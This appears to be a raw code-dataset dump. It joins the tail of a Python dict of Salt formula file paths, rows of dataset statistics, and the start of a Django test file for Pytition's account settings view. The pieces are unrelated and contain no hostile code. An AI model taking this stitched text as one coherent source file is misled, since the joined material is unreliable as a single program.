'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/case': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/cherrypytest/case': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext/console': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/ext/os_data': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/helpers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/jenkins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/mock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/parser': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/parser/cover': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/fileperms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/pep263': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/pep8': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_filter_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_imports_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_input_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_map_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_xrange_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/py3modernize/fixes/fix_zip_salt_six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/smartup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/pylintplugins/strings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/runtests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/unit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting/xmlunit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-vsx/django-demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-vsx/django-demo-app/file_root': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltflo/saltflo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/saltutil/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_saltstack_org/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_modules/environ': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_modules/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_states/environ': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/_states/github': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-rocks/graphite/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstackme_salt-sandbox/_modules/cloud_config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saurabhsurana_salt-stack-demo/ext-pillar/demo_enc_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/scalr-tutorials_scalr-saltstack/scripts/minion-configure': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/serverhorror_test-saltstack/_grains/custom': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/serverhorror_test-saltstack/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/servo_saltfs/buildbot/github_buildbot': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/servo_saltfs/buildbot/master/passwords': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shepax_sqlserver_saltstack/sqlodbc': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shepax_sqlserver_saltstack/sqlserver': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shomodj_salt-states/salt/_modules/mathmagic': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/shomodj_salt-states/salt/modoboa/nginx/gunicorn.conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackforge_keystone-salt-formula/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/stackstrap_stackstrap/stackstrap/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/svetlyak40wt_salt-firewall-formula/_states/firewall': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/swdream_saltstack/hellowould': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/swdream_saltstack/hellowould/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tateeskew_salt-states/graphite/graphite-web/opt/graphite/webapp/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/_modules/vm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/_returners/sentry_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tdf_salt-states-base/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/states/_states/shaping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tf198_salt-states/tests/unit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/doc/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/salt/ext/alert': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thatch45_salt-alert/salt/ext/alert/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/distribute_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/roots/usr/local/sbin/get-distribute': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/salt/roots/usr/local/sbin/get-pip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/thedrow_python-baseline/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_flexnet-salt-states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_saltstack-dev-env/scripts/fetch_formulas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/timoguin_saltstack-dev-env/scripts/make_formula_links': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/_returners/mongo_saltpad_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/default_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/local_settings.sample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tinyclues_saltpad/saltpad/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tonthon_salt-introduction/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/torhve_states/wsproxy/websocket': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/trebuchet-deploy_trebuchet/modules/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/trebuchet-deploy_trebuchet/returners/deploy_redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/tricoder42_age-of-saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/vinta_HeelsFetishism-Deployment/salt/scrapy/settings_prod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/virtru-ops_masterless/masterless': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/virtru-ops_masterless/masterless/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wcannon_saltstack-related/_grains/drives': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wcannon_saltstack-related/_modules/wc_ec2_metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wendall911_wendall911-salt-states/salt/_grains/ip_addr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_apt-cacher-ng-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_cookiecutter-saltformula/{{cookiecutter.repo_name}}/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_dotfiles-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_heka-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_htop-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_i3wm-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_ipython-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_mercurial-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_packer-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_python-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_repos-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_shinken-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_shorewall-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_supervisord-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_tortoisehg-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_ufw-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_vagrant-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_virtualbox-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_wajig-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/westurner_winswitch-formula/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/worstadmin_salt-module-tcplisten/tcplisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/worstadmin_salt-module-tcplisten/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/demo/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/demo_project/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/wunki_django-salted/demo_project/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_grains/ipmi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_outputter/ipmiviewer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_outputter/xencenter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_retunner/check_mk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/_retunner/local_test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/cmk/server/wato/cmdb/conf.d/cs_apis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/import_cloudstack_vm/CloudStack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/import_cloudstack_vm/CloudStack/BaseClient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/nagios02/import_cloudstack_vm/CloudStack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/nagios/nagios02/import_cloudstack_vm/CloudStack/BaseClient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/ERPXE/files/ks/pub-scripts/xs602-constants-100G': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/SYSLINUX': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/SYSLINUX/label': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/cpiofile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/init_constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/XenServer/installer/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/config/url': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/pxe/webpy-app/simple-todo-read-only/controllers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/build/lib/argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/doc/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/python/argparse-1.2.1/test/test_argparse': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/racktables/read_conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/modules/hwinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/modules/swinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/salt/master/extmods/outputter/check_mk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/contrib/check_ganglia': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_element': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/Gmetad/gmetad_random': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmetad-python/gmetad_consistency_test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/apache_status/apache_status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/DBUtil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/db/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/disk/diskfree': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/example/example': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/example/spfexample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/memcached/memcached': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/memory/mem_stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/multi_interface': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/netstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/tcpconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/network/traffic1': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/nfs/nfsstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/ssl/entropy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/varnish/varnish': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/service/ganglia/ganglia_rpm_build/ganglia-3.5.0/gmond/python_modules/vm_stats/vm_stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/xtha_salt/roles/squid/etc/python2.6/sitecustomize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/y0j_salt-configs/dev/django/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yesimon_salt-states/_states/brew_cask': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ythuang_salt/deploy/fabfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yumike_pycon2013/salt/roots/salt/_states/nginx_site': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yumike_pycon2013/salt/roots/salt/helloworld/app': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/ihs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/varnish': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/was': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_grains/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/ihs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/jboss': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/salt/_modules/was': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/yyf1986_saltstack/tools/event/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zen4ever_salty-wsgi/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zignig_mini_master/salt/master/files/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zignig_substrate_salt/salt/files/scripts/full_replica': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/zombiemonkey_ebi/ebi/version': 1} | 105.631268 | 168 | 0.817308 | 15,046 | 107,427 | 5.720125 | 0.06726 | 0.177424 | 0.129983 | 0.2127 | 0.925463 | 0.925463 | 0.925463 | 0.924987 | 0.909859 | 0.874397 | 0 | 0.013077 | 0.028382 | 107,427 | 1,017 | 169 | 105.631268 | 0.811474 | 0 | 0 | 0 | 0 | 0.838741 | 0.924145 | 0.924145 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.001967 | 0.0059 | 0 | 0.0059 | 0.000983 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e03e22a2604d48129ba1ea79fe3377d57ab0af80 | 39,963 | py | Python | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | pytition/petition/tests/tests_AccountSettingsView.py | Te-k/Pytition | 16ebce01b491b72ed387709d9b705f7cb0d5476f | [
"BSD-3-Clause"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from petition.models import Organization, Petition, PytitionUser
from petition.helpers import get_update_form
from petition.forms import DeleteAccountForm
users = ['julia', 'john', 'max', 'sarah']
orgs = ['RAP', 'Greenpeace', 'Attac', 'Les Amis de la Terre']
user_published_petitions = {
'john': 0,
'sarah': 0,
'julia': 5,
'max': 10
}
user_unpublished_petitions = {
'john': 0,
'sarah': 5,
'julia': 0,
'max': 10
}
org_published_petitions = {
'RAP': 0,
'Les Amis de la Terre': 0,
'Greenpeace': 1,
'Attac': 2
}
org_unpublished_petitions = {
'RAP': 0,
'Les Amis de la Terre': 1,
'Greenpeace': 0,
'Attac': 2
}
org_members = {
'RAP': ['julia'],
'Les Amis de la Terre': ['julia', 'max'],
'Attac': ['john'],
}
class AccountSettingsViewTest(TestCase):
"""Test index view"""
@classmethod
def setUpTestData(cls):
User = get_user_model()
for org in orgs:
o = Organization.objects.create(name=org)
for i in range(org_published_petitions[org]):
p = Petition.objects.create(published=True)
o.petitions.add(p)
p.save()
for i in range(org_unpublished_petitions[org]):
p = Petition.objects.create(published=False)
o.petitions.add(p)
p.save()
o.save()
for user in users:
u = User.objects.create_user(user, password=user)
u.first_name = user
u.last_name = user + "Last"
u.save()
pu = PytitionUser.objects.get(user__username=user)
for i in range(user_published_petitions[user]):
p = Petition.objects.create(published=True)
pu.petitions.add(p)
p.save()
for i in range(user_unpublished_petitions[user]):
p = Petition.objects.create(published=False)
pu.petitions.add(p)
p.save()
for orgname in org_members:
org = Organization.objects.get(name=orgname)
for username in org_members[orgname]:
user = PytitionUser.objects.get(user__username=username)
org.add_member(user)
# give julia can_modify_petitions permission on "Les Amis de la Terre" organization
perm = PytitionUser.objects.get(user__username="julia").permissions\
.get(organization__name="Les Amis de la Terre")
perm.can_modify_petitions = True
perm.save()
def login(self, name, password=None):
self.client.login(username=name, password=password if password else name)
self.pu = PytitionUser.objects.get(user__username=name)
return self.pu
def logout(self):
self.client.logout()
def tearDown(self):
# Clean up run after every test method.
pass
def test_NotLoggedIn(self):
self.logout()
response = self.client.get(reverse("account_settings"), follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "registration/login.html")
self.assertTemplateUsed(response, "layouts/base.html")
def test_UserOK1(self):
john = self.login("john")
update_info_form = get_update_form(john.user)
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK2(self):
julia = self.login("julia")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], julia)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK3(self):
max = self.login("max")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], max)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserOK4(self):
sarah = self.login("sarah")
response = self.client.get(reverse("account_settings"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], sarah)
